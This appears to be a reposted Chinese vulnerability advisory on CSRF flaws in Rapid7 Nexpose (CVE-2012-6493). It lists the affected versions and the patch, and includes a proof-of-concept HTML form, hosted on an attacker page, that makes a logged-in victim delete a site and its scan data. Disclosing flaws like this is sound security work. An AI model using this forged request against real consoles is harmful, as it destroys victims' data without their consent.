Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Rapid7 Nexpose多个跨站请求伪造漏洞

发布日期:2013-01-03
更新日期:2013-01-07受影响系统:
Rapid7 Nexpose < 5.5.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57150
 CVE(CAN) ID: CVE-2012-6493
 
Nexpose是一款漏洞管理软件。
 
Nexpose 5.5.4之前版本没有正确检查各个URL的refer域,远程攻击者若通过某种方式获得了合法用户的cookie,那么便可以以合法用户的身份执行删除扫描数据和站点等操作。
 
<*来源:Robert Gilbert
 
 链接:http://seclists.org/bugtraq/2013/Jan/13
       https://community.rapid7.com/docs/DOC-2065#release5
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Exploit steps for proof-of-concept:
 1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains:
 [code]
 <html>
 <!-- Nexpose CSRF PoC -->
 <body>
 <form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1"; method="POST" enctype="multipart/form-data">
     <input type="submit" value="delete site" />
   </form>
   <script>
     //document.forms[0].submit(); //uncomment to auto-submit
   </script>
 </body>
 </html>
 [/code]
 2.      Lure victim to http://attackersite.com/nexpose-csrf.htm.
 3.      Site with ID 1 is deleted when form is submitted.建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Rapid7
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
https://community.rapid7.com/docs/DOC-2065#release5Centrify Deployment Manager任意文件覆盖漏洞e107 "e107_admin/download.php"跨站请求伪造漏洞相关资讯      Nexpose安全漏洞  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款